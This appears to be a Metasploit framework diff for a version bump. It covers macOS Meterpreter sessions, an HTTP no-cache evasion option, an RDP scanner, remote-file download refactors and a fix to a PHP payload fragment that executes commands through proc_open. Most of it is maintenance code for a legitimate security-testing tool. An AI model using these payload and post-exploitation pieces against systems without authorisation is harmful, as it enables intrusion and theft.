# just delete the fake database.yml and the After hook will restore the real database.yml from the backup location
|
||||
if File.exist?(backup_project_configurations_path)
|
||||
File.delete(project_configurations_path)
|
||||
else
|
||||
# project contains the real database.yml and there was no previous, aborted run.
|
||||
File.rename(project_configurations_path, backup_project_configurations_path)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def self.backup_project_configurations_path
|
||||
"#{project_configurations_path}.cucumber.bak"
|
||||
end
|
||||
|
||||
def self.restore_project_configurations
|
||||
if File.exist?(backup_project_configurations_path)
|
||||
if File.exist?(project_configurations_path)
|
||||
# Remove fake, leftover database.yml
|
||||
File.delete(project_configurations_path)
|
||||
end
|
||||
|
||||
File.rename(backup_project_configurations_path, project_configurations_path)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.15.1"
|
||||
VERSION = "4.15.4"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/meterpreter'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'osx'
|
||||
self.base_arch = ARCH_X64
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -0,0 +1,29 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/meterpreter'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'osx'
|
||||
self.base_arch = ARCH_X86
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -810,6 +810,7 @@ module Msf
|
|||
|
||||
%Q|<html>
|
||||
<head>
|
||||
<meta http-equiv="cache-control" content="no-cache" />
|
||||
<script>
|
||||
#{js}
|
||||
</script>
|
||||
|
|
|
@ -32,6 +32,7 @@ module Exploit::Remote::HttpServer
|
|||
|
||||
register_evasion_options(
|
||||
[
|
||||
OptBool.new('HTTP::no_cache', [false, 'Disallow the browser to cache HTTP content', false]),
|
||||
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]),
|
||||
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]),
|
||||
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]),
|
||||
|
@ -558,6 +559,10 @@ module Exploit::Remote::HttpServer
|
|||
response.headers.junk_headers = 1
|
||||
end
|
||||
|
||||
if datastore['HTTP::no_cache']
|
||||
response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate'
|
||||
end
|
||||
|
||||
headers.each_pair { |k,v| response[k] = v }
|
||||
|
||||
cli.send_response(response)
|
||||
|
|
|
@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver
|
|||
|
||||
raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock)
|
||||
res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock)
|
||||
if res[0..2] == '250'
|
||||
if res && res[0..2] == '250'
|
||||
resp = raw_send_recv("DATA\r\n", nsock)
|
||||
|
||||
# If the user supplied a Date field, use that, else use the current
|
||||
|
@ -242,10 +242,12 @@ module Exploit::Remote::SMTPDeliver
|
|||
# to dump it all.
|
||||
vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}")
|
||||
end
|
||||
|
||||
nsock.put(cmd)
|
||||
res = nsock.get_once
|
||||
|
||||
begin
|
||||
nsock.put(cmd)
|
||||
res = nsock.get_once
|
||||
rescue
|
||||
return nil
|
||||
end
|
||||
# Don't truncate the server output because it might be helpful for
|
||||
# debugging.
|
||||
vprint_status("S: #{res.strip}") if res
|
||||
|
|
|
@ -173,7 +173,8 @@ class Msf::Modules::Loader::Base
|
|||
true
|
||||
}
|
||||
|
||||
loaded = namespace_module_transaction(type + "/" + module_reference_name, :reload => reload, &try_eval_module)
|
||||
loaded = namespace_module_transaction(type + "/" + module_reference_name,
|
||||
:reload => reload, &try_eval_module)
|
||||
unless loaded
|
||||
return false
|
||||
end
|
||||
|
|
|
@ -28,12 +28,11 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
|
|||
def each_module_reference_name(path, opts={})
|
||||
whitelist = opts[:whitelist] || []
|
||||
::Dir.foreach(path) do |entry|
|
||||
|
||||
full_entry_path = ::File.join(path, entry)
|
||||
type = entry.singularize
|
||||
|
||||
unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
|
||||
next
|
||||
end
|
||||
next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
|
||||
|
||||
full_entry_pathname = Pathname.new(full_entry_path)
|
||||
|
||||
|
@ -43,6 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
|
|||
entry_descendant_pathname = Pathname.new(entry_descendant_path)
|
||||
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
|
||||
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
|
||||
next if File::basename(relative_entry_descendant_path) == "example.rb"
|
||||
|
||||
# The module_reference_name doesn't have a file extension
|
||||
module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)
|
||||
|
|
|
@ -103,7 +103,7 @@ module Msf::Payload::Php
|
|||
}else"
|
||||
proc_open = "
|
||||
if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){
|
||||
$handle=proc_open(#{cmd},array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
|
||||
$handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
|
||||
#{output}=NULL;
|
||||
while(!feof($pipes[1])){
|
||||
#{output}.=fread($pipes[1],1024);
|
||||
|
|
|
@ -278,6 +278,16 @@ module RFTransceiver
|
|||
return_success(r)
|
||||
end
|
||||
|
||||
#
|
||||
# Sets lowball. Ensure you set the frequency first before using this
|
||||
# @return [Boolean] success value
|
||||
def set_lowball
|
||||
return false unless is_rf?
|
||||
self.index ||= 0
|
||||
r = client.rftransceiver.set_lowball(self.index)
|
||||
return_success(r)
|
||||
end
|
||||
|
||||
#
|
||||
# Set power level
|
||||
# @param level [Integer] Power level
|
||||
|
|
|
@ -21,3 +21,4 @@ end
|
|||
|
||||
# Executable generation and encoding
|
||||
require 'msf/util/exe'
|
||||
require 'msf/util/helper'
|
||||
|
|
|
@ -106,7 +106,7 @@ require 'msf/core/exe/segment_appender'
|
|||
# @return [String]
|
||||
# @return [NilClass]
|
||||
def self.to_executable(framework, arch, plat, code = '', opts = {})
|
||||
if elf? code
|
||||
if elf? code or macho? code
|
||||
return code
|
||||
end
|
||||
|
||||
|
@ -2148,15 +2148,19 @@ require 'msf/core/exe/segment_appender'
|
|||
end
|
||||
end
|
||||
when 'macho', 'osx-app'
|
||||
macho = case arch
|
||||
when ARCH_X86,nil
|
||||
to_osx_x86_macho(framework, code, exeopts)
|
||||
when ARCH_X64
|
||||
to_osx_x64_macho(framework, code, exeopts)
|
||||
when ARCH_ARMLE
|
||||
to_osx_arm_macho(framework, code, exeopts)
|
||||
when ARCH_PPC
|
||||
to_osx_ppc_macho(framework, code, exeopts)
|
||||
if macho? code
|
||||
macho = code
|
||||
else
|
||||
macho = case arch
|
||||
when ARCH_X86,nil
|
||||
to_osx_x86_macho(framework, code, exeopts)
|
||||
when ARCH_X64
|
||||
to_osx_x64_macho(framework, code, exeopts)
|
||||
when ARCH_ARMLE
|
||||
to_osx_arm_macho(framework, code, exeopts)
|
||||
when ARCH_PPC
|
||||
to_osx_ppc_macho(framework, code, exeopts)
|
||||
end
|
||||
end
|
||||
fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
|
||||
when 'vba'
|
||||
|
@ -2284,6 +2288,10 @@ require 'msf/core/exe/segment_appender'
|
|||
code[0..3] == "\x7FELF"
|
||||
end
|
||||
|
||||
def self.macho?(code)
|
||||
code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE"
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,21 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
module Msf
|
||||
module Util
|
||||
class Helper
|
||||
# Cross-platform way of finding an executable in the $PATH.
|
||||
#
|
||||
# which('ruby') #=> /usr/bin/ruby
|
||||
def self.which(cmd)
|
||||
exts = ENV['PATHEXT'] ? ENV['PATHEXT'].split(';') : ['']
|
||||
ENV['PATH'].split(File::PATH_SEPARATOR).each do |path|
|
||||
exts.each { |ext|
|
||||
exe = File.join(path, "#{cmd}#{ext}")
|
||||
return exe if File.executable?(exe) && !File.directory?(exe)
|
||||
}
|
||||
end
|
||||
return nil
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -186,6 +186,10 @@ class RFTransceiver < Extension
|
|||
client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}")
|
||||
end
|
||||
|
||||
def set_lowball(idx)
|
||||
client.send_request("/rftransceiver/#{idx}/set_lowball")
|
||||
end
|
||||
|
||||
def set_maxpower(idx)
|
||||
client.send_request("/rftransceiver/#{idx}/set_maxpower")
|
||||
end
|
||||
|
|
|
@ -34,6 +34,7 @@ class Console::CommandDispatcher::RFtransceiver
|
|||
'deviation' => 'sets the deviation',
|
||||
'sync_word' => 'sets the sync word',
|
||||
'preamble' => 'sets the preamble number',
|
||||
'lowball' => 'sets lowball',
|
||||
'power' => 'sets the power level',
|
||||
'maxpower' => 'sets max power'
|
||||
}
|
||||
|
@ -528,6 +529,20 @@ class Console::CommandDispatcher::RFtransceiver
|
|||
print_success(r)
|
||||
end
|
||||
|
||||
def cmd_lowball_help
|
||||
print_line("Lowball is frequency dependent. Set frequency first")
|
||||
end
|
||||
|
||||
def cmd_lowball(*args)
|
||||
self.idx ||= 0
|
||||
if args.length.positive?
|
||||
cmd_lowball_help
|
||||
return
|
||||
end
|
||||
r = client.rftransceiver.set_lowball(idx)
|
||||
print_success(r)
|
||||
end
|
||||
|
||||
def cmd_maxpower_help
|
||||
print_line("Max power is frequency dependent. Set frequency first")
|
||||
end
|
||||
|
|
|
@ -195,19 +195,15 @@ class Dir < Rex::Post::Dir
|
|||
# Downloads the contents of a remote directory a
|
||||
# local directory, optionally in a recursive fashion.
|
||||
#
|
||||
def Dir.download(dst, src, opts, force = true, glob = nil, &stat)
|
||||
recursive = false
|
||||
continue = false
|
||||
tries = false
|
||||
tries_no = 0
|
||||
def Dir.download(dst, src, opts = {}, force = true, glob = nil, &stat)
|
||||
tries_cnt = 0
|
||||
if opts
|
||||
timestamp = opts["timestamp"]
|
||||
recursive = true if opts["recursive"]
|
||||
continue = true if opts["continue"]
|
||||
tries = true if opts["tries"]
|
||||
tries_no = opts["tries_no"]
|
||||
end
|
||||
|
||||
continue = opts["continue"]
|
||||
recursive = opts["recursive"]
|
||||
timestamp = opts["timestamp"]
|
||||
tries_no = opts["tries_no"] || 0
|
||||
tries = opts["tries"]
|
||||
|
||||
begin
|
||||
dir_files = self.entries(src, glob)
|
||||
rescue Rex::TimeoutError
|
||||
|
|
|
@ -301,8 +301,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
|
|||
# If a block is given, it will be called before each file is downloaded and
|
||||
# again when each download is complete.
|
||||
#
|
||||
def File.download(dest, src_files, opts = nil, &stat)
|
||||
timestamp = opts["timestamp"] if opts
|
||||
def File.download(dest, src_files, opts = {}, &stat)
|
||||
timestamp = opts["timestamp"]
|
||||
[*src_files].each { |src|
|
||||
if (::File.basename(dest) != File.basename(src))
|
||||
# The destination when downloading is a local file so use this
|
||||
|
@ -324,18 +324,15 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
|
|||
#
|
||||
# Download a single file.
|
||||
#
|
||||
def File.download_file(dest_file, src_file, opts = nil, &stat)
|
||||
continue=false
|
||||
tries=false
|
||||
tries_no=0
|
||||
def File.download_file(dest_file, src_file, opts = {}, &stat)
|
||||
stat ||= lambda { |a,b,c| }
|
||||
|
||||
if opts
|
||||
continue = true if opts["continue"]
|
||||
adaptive = true if opts['adaptive']
|
||||
tries = true if opts["tries"]
|
||||
tries_no = opts["tries_no"]
|
||||
end
|
||||
adaptive = opts["adaptive"]
|
||||
block_size = opts["block_size"] || 1024 * 1024
|
||||
continue = opts["continue"]
|
||||
tries_no = opts["tries_no"]
|
||||
tries = opts["tries"]
|
||||
|
||||
src_fd = client.fs.file.new(src_file, "rb")
|
||||
|
||||
# Check for changes
|
||||
|
@ -373,7 +370,6 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
|
|||
end
|
||||
|
||||
# Keep transferring until EOF is reached...
|
||||
block_size = (opts && opts['block_size']) || 1024 * 1024
|
||||
begin
|
||||
if tries
|
||||
# resume when timeouts encountered
|
||||
|
|
|
@ -259,7 +259,7 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
|
||||
cmd_execute("-f", path, "-c", "-H", "-i")
|
||||
end
|
||||
when 'linux'
|
||||
when 'linux', 'osx'
|
||||
# Don't expand_path() this because it's literal anyway
|
||||
path = "/bin/sh"
|
||||
cmd_execute("-f", path, "-c", "-i")
|
||||
|
|
|
@ -1,74 +0,0 @@
|
|||
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
|
||||
# It is recommended to regenerate this file in the future when you upgrade to a
|
||||
# newer version of cucumber-rails. Consider adding your own code to a new file
|
||||
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
|
||||
# files.
|
||||
|
||||
|
||||
unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
|
||||
|
||||
vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
|
||||
$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
|
||||
|
||||
begin
|
||||
require 'cucumber/rake/task'
|
||||
|
||||
namespace :cucumber do
|
||||
Cucumber::Rake::Task.new({:ok => 'db:test:prepare'}, 'Run features that should pass') do |t|
|
||||
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
|
||||
t.fork = true # You may get faster startup if you set this to false
|
||||
t.profile = 'default'
|
||||
end
|
||||
|
||||
Cucumber::Rake::Task.new({:wip => 'db:test:prepare'}, 'Run features that are being worked on') do |t|
|
||||
t.binary = vendored_cucumber_bin
|
||||
t.fork = true # You may get faster startup if you set this to false
|
||||
t.profile = 'wip'
|
||||
end
|
||||
|
||||
Cucumber::Rake::Task.new({:rerun => 'db:test:prepare'}, 'Record failing features and run only them if any exist') do |t|
|
||||
t.binary = vendored_cucumber_bin
|
||||
t.fork = true # You may get faster startup if you set this to false
|
||||
t.profile = 'rerun'
|
||||
end
|
||||
|
||||
desc 'Run all features'
|
||||
task :all => [:ok, :wip]
|
||||
|
||||
task :statsetup do
|
||||
require 'rails/code_statistics'
|
||||
::STATS_DIRECTORIES << %w(Cucumber\ features features) if File.exist?('features')
|
||||
::CodeStatistics::TEST_TYPES << "Cucumber features" if File.exist?('features')
|
||||
end
|
||||
end
|
||||
desc 'Alias for cucumber:ok'
|
||||
task :cucumber => 'cucumber:ok'
|
||||
|
||||
task :default => :cucumber
|
||||
|
||||
task :features => :cucumber do
|
||||
STDERR.puts "*** The 'features' task is deprecated. See rake -T cucumber ***"
|
||||
end
|
||||
|
||||
# In case we don't have ActiveRecord, append a no-op task that we can depend upon.
|
||||
task 'db:test:prepare' do
|
||||
end
|
||||
|
||||
task 'db:config:restore' do
|
||||
require 'metasploit/framework/database/cucumber'
|
||||
Metasploit::Framework::Database::Cucumber.restore_project_configurations
|
||||
end
|
||||
|
||||
# Restore the config/database.yml from config/database.cucumber.yml before attempting to copy development to test
|
||||
# database in order to recover from interrupted cucumber runs
|
||||
task 'environment' => 'db:config:restore'
|
||||
|
||||
task :stats => 'cucumber:statsetup'
|
||||
rescue LoadError
|
||||
desc 'cucumber rake task not available (cucumber not installed)'
|
||||
task :cucumber do
|
||||
abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -1,30 +0,0 @@
|
|||
unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
|
||||
|
||||
vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
|
||||
$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
|
||||
|
||||
begin
|
||||
require 'cucumber/rake/task'
|
||||
|
||||
namespace :cucumber do
|
||||
Cucumber::Rake::Task.new({:boot => 'db:test:prepare'}, 'Run features that should pass') do |t|
|
||||
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
|
||||
t.fork = true # You may get faster startup if you set this to false
|
||||
t.profile = 'boot'
|
||||
end
|
||||
Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t|
|
||||
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
|
||||
t.fork = true # You may get faster startup if you set this to false
|
||||
t.profile = 'exploit'
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
rescue LoadError
|
||||
desc 'cucumber rake task not available (cucumber not installed)'
|
||||
task :cucumber do
|
||||
abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -13,6 +13,7 @@ end
|
|||
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
|
||||
require 'metasploit/framework/version'
|
||||
require 'metasploit/framework/rails_version_constraint'
|
||||
require 'msf/util/helper'
|
||||
|
||||
Gem::Specification.new do |spec|
|
||||
spec.name = 'metasploit-framework'
|
||||
|
@ -24,7 +25,8 @@ Gem::Specification.new do |spec|
|
|||
spec.homepage = 'https://www.metasploit.com'
|
||||
spec.license = 'BSD-3-clause'
|
||||
|
||||
if File.directory?(File.join(File.dirname(__FILE__), ".git"))
|
||||
# only do a git ls-files if the .git folder exists and we have a git binary in PATH
|
||||
if File.directory?(File.join(File.dirname(__FILE__), ".git")) && Msf::Util::Helper.which("git")
|
||||
spec.files = `git ls-files`.split($/).reject { |file|
|
||||
file =~ /^documentation|^external/
|
||||
}
|
||||
|
@ -68,9 +70,9 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.2.37'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.2.42'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10'
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
|
||||
# Needed by msfgui and other rpc components
|
||||
spec.add_runtime_dependency 'msgpack'
|
||||
# get list of network interfaces, like eth* from OS.
|
||||
|
@ -134,7 +136,7 @@ Gem::Specification.new do |spec|
|
|||
# Library for Generating Randomized strings valid as Identifiers such as variable names
|
||||
spec.add_runtime_dependency 'rex-random_identifier'
|
||||
# library for creating Powershell scripts for exploitation purposes
|
||||
spec.add_runtime_dependency 'rex-powershell'
|
||||
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
|
||||
# Library for processing and creating Zip compatbile archives
|
||||
spec.add_runtime_dependency 'rex-zip'
|
||||
# Library for parsing offline Windows Registry files
|
||||
|
|
|
@ -30,6 +30,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
unless wordlist
|
||||
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
|
||||
return
|
||||
end
|
||||
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
cracker.wordlist = wordlist.path
|
||||
|
|
|
@ -29,6 +29,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
unless wordlist
|
||||
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
|
||||
return
|
||||
end
|
||||
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
cracker.wordlist = wordlist.path
|
||||
|
|
|
@ -44,6 +44,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
unless wordlist
|
||||
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
|
||||
return
|
||||
end
|
||||
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
cracker.wordlist = wordlist.path
|
||||
|
|
|
@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
unless wordlist
|
||||
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
|
||||
return
|
||||
end
|
||||
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
cracker.wordlist = wordlist.path
|
||||
|
|
|
@ -30,6 +30,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
unless wordlist
|
||||
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
|
||||
return
|
||||
end
|
||||
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
cracker.wordlist = wordlist.path
|
||||
|
|
|
@ -34,6 +34,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
unless wordlist
|
||||
print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')
|
||||
return
|
||||
end
|
||||
|
||||
wordlist.close
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,44 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
###
|
||||
#
|
||||
# This sample auxiliary module simply displays the selected action and
|
||||
# registers a custom command that will show up when the module is used.
|
||||
#
|
||||
###
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sample Auxiliary Module',
|
||||
# The description can be multiple lines, but does not preserve formatting.
|
||||
'Description' => 'Sample Auxiliary Module',
|
||||
'Author' => ['Joe Module <joem@example.com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
['Default Action'],
|
||||
['Another Action']
|
||||
]
|
||||
))
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Running the simple auxiliary module with action #{action.name}")
|
||||
end
|
||||
|
||||
# auxiliary modules can register new commands, they all call cmd_* to
|
||||
# dispatch them
|
||||
def auxiliary_commands
|
||||
return { "aux_extra_command" => "Run this auxiliary test commmand" }
|
||||
end
|
||||
|
||||
def cmd_aux_extra_command(*args)
|
||||
print_status("Running inside aux_extra_command(#{args.join(" ")})")
|
||||
end
|
||||
|
||||
end
|
|
@ -73,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def on_request_exploit(cli, req, target_info)
|
||||
print_target_info(cli, target_info)
|
||||
send_not_found(cli)
|
||||
send_response(cli, '')
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -0,0 +1,104 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Identify endpoints speaking the Remote Desktop Protocol (RDP)',
|
||||
'Description' => %q(
|
||||
This module attempts to connect to the specified Remote Desktop Protocol port
|
||||
and determines if it speaks RDP.
|
||||
),
|
||||
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://msdn.microsoft.com/en-us/library/cc240445.aspx']
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3389),
|
||||
OptBool.new('TLS', [true, 'Wheter or not request TLS security', true]),
|
||||
OptBool.new('CredSSP', [true, 'Whether or not to request CredSSP', true]),
|
||||
OptBool.new('EarlyUser', [true, 'Whether to support Earlier User Authorization Result PDU', false])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
# any TPKT v3 + x.2224 COTP Connect Confirm
|
||||
RDP_RE = /^\x03\x00.{3}\xd0.{5}.*$/
|
||||
def rdp?
|
||||
sock.put(@probe)
|
||||
response = sock.get_once(-1)
|
||||
if response
|
||||
if RDP_RE.match?(response)
|
||||
# XXX: it might be helpful to decode the response and show what was selected.
|
||||
print_good("Identified RDP")
|
||||
return true
|
||||
else
|
||||
vprint_status("No match for '#{Rex::Text.to_hex_ascii(response)}'")
|
||||
end
|
||||
else
|
||||
vprint_status("No response")
|
||||
end
|
||||
end
|
||||
|
||||
def setup
|
||||
# build a simple TPKT v3 + x.224 COTP Connect Request. optionally append
|
||||
# RDP negotiation request with TLS, CredSSP and Early User as requesteste
|
||||
requested_protocols = 0
|
||||
if datastore['TLS']
|
||||
requested_protocols = requested_protocols ^ 0b1
|
||||
end
|
||||
if datastore['CredSSP']
|
||||
requested_protocols = requested_protocols ^ 0b10
|
||||
end
|
||||
if datastore['EarlyUser']
|
||||
requested_protocols = requested_protocols ^ 0b1000
|
||||
end
|
||||
|
||||
if requested_protocols == 0
|
||||
tpkt_len = 11
|
||||
cotp_len = 6
|
||||
pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0 ]
|
||||
pack_string = "CCnCCnnC"
|
||||
else
|
||||
tpkt_len = 19
|
||||
cotp_len = 14
|
||||
pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0, 1, 0, 8, 0, requested_protocols ]
|
||||
pack_string = "CCnCCnnCCCCCV"
|
||||
end
|
||||
@probe = pack.pack(pack_string)
|
||||
end
|
||||
|
||||
def run_host(_ip)
|
||||
begin
|
||||
connect
|
||||
return unless rdp?
|
||||
rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \
|
||||
::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e
|
||||
vprint_error("error while connecting and negotiating RDP: #{e}")
|
||||
return
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
report_service(
|
||||
host: rhost,
|
||||
port: rport,
|
||||
proto: 'tcp',
|
||||
name: 'RDP'
|
||||
)
|
||||
end
|
||||
end
|
|
@ -630,19 +630,19 @@ class MetasploitModule < Msf::Auxiliary
|
|||
def key_from_pqe(p, q, e)
|
||||
# Returns an RSA Private Key from Factors
|
||||
key = OpenSSL::PKey::RSA.new()
|
||||
key.set_factors(p, q)
|
||||
|
||||
key.p = p
|
||||
key.q = q
|
||||
|
||||
key.n = key.p*key.q
|
||||
key.e = e
|
||||
|
||||
n = key.p * key.q
|
||||
phi = (key.p - 1) * (key.q - 1 )
|
||||
key.d = key.e.mod_inverse(phi)
|
||||
d = OpenSSL::BN.new(e).mod_inverse(phi)
|
||||
|
||||
key.dmp1 = key.d % (key.p - 1)
|
||||
key.dmq1 = key.d % (key.q - 1)
|
||||
key.iqmp = key.q.mod_inverse(key.p)
|
||||
key.set_key(n, e, d)
|
||||
|
||||
dmp1 = key.d % (key.p - 1)
|
||||
dmq1 = key.d % (key.q - 1)
|
||||
iqmp = key.q.mod_inverse(key.p)
|
||||
|
||||
key.set_crt_params(dmp1, dmq1, iqmp)
|
||||
|
||||
return key
|
||||
end
|
||||
|
|
|
@ -0,0 +1,95 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
###
|
||||
#
|
||||
# This exploit sample shows how an exploit module could be written to exploit
|
||||
# a bug in an arbitrary TCP server.
|
||||
#
|
||||
###
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
#
|
||||
# This exploit affects TCP servers, so we use the TCP client mixin.
|
||||
